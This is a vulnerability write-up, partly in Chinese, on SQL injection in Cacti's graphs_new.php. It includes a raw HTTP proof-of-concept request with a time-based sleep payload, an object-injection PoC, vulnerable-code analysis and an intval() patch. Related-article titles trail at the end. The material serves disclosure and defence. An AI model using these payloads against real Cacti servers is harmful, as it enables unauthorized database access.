cacti graphs new.php,Cacti /graphs_new.php SQL Injection Vulnerability
catalogue
1. 漏洞描述2. 漏洞触发条件3. 漏洞影响范围4. 漏洞代码分析5. 防御方法6. 攻防思考
1. 漏洞描述
other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the bug http://bugs.cacti.net/view.php?id=2652
Relevant Link:
http://bobao.360.cn/snapshot/index?id=146936
2. 漏洞触发条件
0x1: POC1: SQL Inject
POST /cacti/graphs_new.php HTTP/1.1Host:192.168.217.133Proxy-Connection: keep-alive
Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin:http://192.168.217.133[^]
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer:http://192.168.217.133/cacti/graphs_new.php?host_id=3[^]
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
Content-Length: 189
__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save
0x2: POC2: Object Inject
1. Login2. POST http://target/cacti/graphs_new.php
Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=1&host_id=1&selected_graphs_array=[injection]
{Injection exp can be found on my server: http://pandas.pw/cacti.exp}
3. mysql log: select graph_template_id from snmp_query_graph where id=1 and benchmark(20000000,sha1(1))--
3. 漏洞影响范围
4. 漏洞代码分析
0x1: Vuls-1: Object Inject To SQL Inject
/graphs_new.php
/*set default action*/
if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }switch ($_REQUEST["action"]) {case 'save'://track function form_save
form_save();break;case 'query_reload':
host_reload_query();
header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);break;default:
include_once("./include/top_header.php");
graphs();
include_once("./include/bottom_footer.php");break;
}
form_save();
function form_save()
{
..if (isset($_POST["save_component_new_graphs"]))
{//Track function host_new_graphs_save()
host_new_graphs_save();
header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
}
}
host_new_graphs_save();
function host_new_graphs_save()
{//variable $selected_graphs_array just unserialized the POST variable which we can control without filter.
$selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));
..//Then the variable goes into a three-dimensional array , and finally the dirty data we can control enter into the select database query, which caused a SQL injection.
$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);
..
}
0x2: Vuls-2: SQL Injection
function form_save()
{if (isset($_POST["save_component_graph"]))
{/*summarize the 'create graph from host template/snmp index' stuff into an array*/
while (list($var, $val) =each($_POST))
{if (preg_match('/^cg_(d+)$/', $var, $matches))
{
$selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;
}//cg_g is not filtered
elseif (preg_match('/^cg_g$/', $var))
{if ($_POST["cg_g"] > 0)
{
$selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;
}
}
elseif (preg_match('/^sg_(d+)_([a-f0-9]{32})$/', $var, $matches))
{
$selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;
}
}if(isset($selected_graphs))
{//外部输入参数带入host_new_graphs中
host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
exit;
}
header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
}if (isset($_POST["save_component_new_graphs"])) {
host_new_graphs_save();
header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
}
}
host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {/*we use object buffering on this page to allow redirection to another page if no
fields are actually drawn*/ob_start();
include_once("./include/top_header.php");
print"
";
$snmp_query_id= 0;
$num_output_fields=array();while (list($form_type, $form_array) =each($selected_graphs_array)) {while (list($form_id1, $form_array2) =each($form_array)) {if ($form_type == "cg") {//sql injection in graph_template_id
$graph_template_id =$form_id1;
html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");
Relevant Link:
http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt
http://bugs.cacti.net/view.php?id=2652
5. 防御方法
/graphs_new.php
function host_new_graphs_save()
{
../*$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);*/$graph_template_id= db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));
..
}
/graphs_new.php
function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {/*we use object buffering on this page to allow redirection to another page if no
fields are actually drawn*/ob_start();
include_once("./include/top_header.php");
print"
";
$snmp_query_id= 0;
$num_output_fields=array();while (list($form_type, $form_array) =each($selected_graphs_array)) {while (list($form_id1, $form_array2) =each($form_array)) {if ($form_type == "cg") {//sql injection in graph_template_id
$graph_template_id =$form_id1;/**/$graph_template_id=intval($graph_template_id);/**/html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");
Relevant Link:
http://www.cacti.net/download_cacti.php
6. 攻防思考
Copyright (c) 2016 Little5ann All rights reserved
cacti graphs new.php,Cacti /graphs_new.php SQL Injection Vulnerability相关推荐
- BBSxp 2008 (Build: 8.0.4) Sql Injection Vulnerability
============================================ 首发http://www.nspcn.org,转载请保留此处版权 ====================== ...
- cacti graphs new.php,Cacti 0.8.8f graphs_new.php SQL注入漏洞
Cacti是一套网络流量监测图形分析工具.它有非常强大的数据和用户管理功能,可以指定每一个用户能查看树状结 构.host以及任何一张图,还可以与LDAP结合进行用户验证,同时也能自己增加模板,功能非常 ...
- Lab: Blind SQL injection with conditional responses PRACTITIONER 带条件响应的SQL盲注靶场复盘
靶场完成目标: This lab contains a blind SQL injection vulnerability. The application uses a tracking cooki ...
- cacti系列(一)之cacti的安装及配置监控mysql服务
简介 Cacti是通过 snmpget来获取数据,使用 RRDtool绘画图形,而且你完全可以不需要了解RRDtool复杂的参数.它提供了非常强大的数据和用户管理功能,可以指定每一个用户能查看树状结构 ...
- cacti pdo_mysql_搭建配置cacti,采集信息监控
安装cacti lamp环境 [iyunv@Cacti ~]#service iptables stop //关闭防火墙服务 [iyunv@Cacti ~]#chkconfig iptables of ...
- cacti mysql 详解,cacti详解和基本配置
cacti简介: cacti是用php语言实现的一个软件,它的主要功能是用snmp服务获取数据,然后用rrdtool存储和更新数据,当用户需要查看数据的时候就用rrdtool生成图表呈现给用户.snm ...
- cacti 配置mysql_Linux Mysql cacti安装配置
Linux Mysql cacti安装配置 时间:2019-01-18 17:44作者:网友投稿 cacti是一套开源的网络监控工具,可以监控主机的状态和负载情况,添加相应的模板后, 可以用来监控ap ...
- ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过 ...
- druid sql黑名单 报异常 sql injection violation, part alway true condition not allow
最近使用druid,发现阿里这个连接池 真的很好用,可以监控到连接池活跃连接数 开辟到多少个连接数 关闭了多少个,对于我在项目中查看错误 问题,很有帮助, 但是最近发现里面 有条sql语句 被拦截了, ...
- 网络***技术开篇——SQL Injection
http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,国内最大的程序员社区CSDN网站的用户数据库被***公开 ...
最新文章
- Python 初学者的最佳学习资源
- bzoj 4012: [HNOI2015]开店 主席树
- 语义分割损失函数系列(2):IoU损失
- HTTPS性能分析小工具HTTPStat
- html把div分成两栏,div+css制作上中下,中间两列的全屏自适应布局
- restful get不传参数404_你知道什么是 Restful 风格吗?SpringMVC 带我们实现它!
- 头条终面:写个消息中间件
- Python的Wiki
- ssis 导入excel_使用SSIS包将MS Excel数据导入数据库
- 中国最优秀的程序员都有哪些?王兴、张小龙、张一鸣是哪类?| 蒋涛说
- 后台产品基本功:RBAC权限后台角色与权限设计
- 检查键是否存在于JavaScript对象中?
- 我的博客学习记录一箩筐(每天更新)
- 2.并发编程--线程基础
- 如何使用 FFMpeg 在 Node.js 中将音频从 Wav 转换为 MP3
- 常用数字信号处理方法在matlab上的实现(目录和先导)
- Clonezilla克隆还原系统
- 宏基因组分析教程-Analysis of Metagenomic Data
- 关于表单防重复提交一些东东
- linux网络hack用法之onlink路由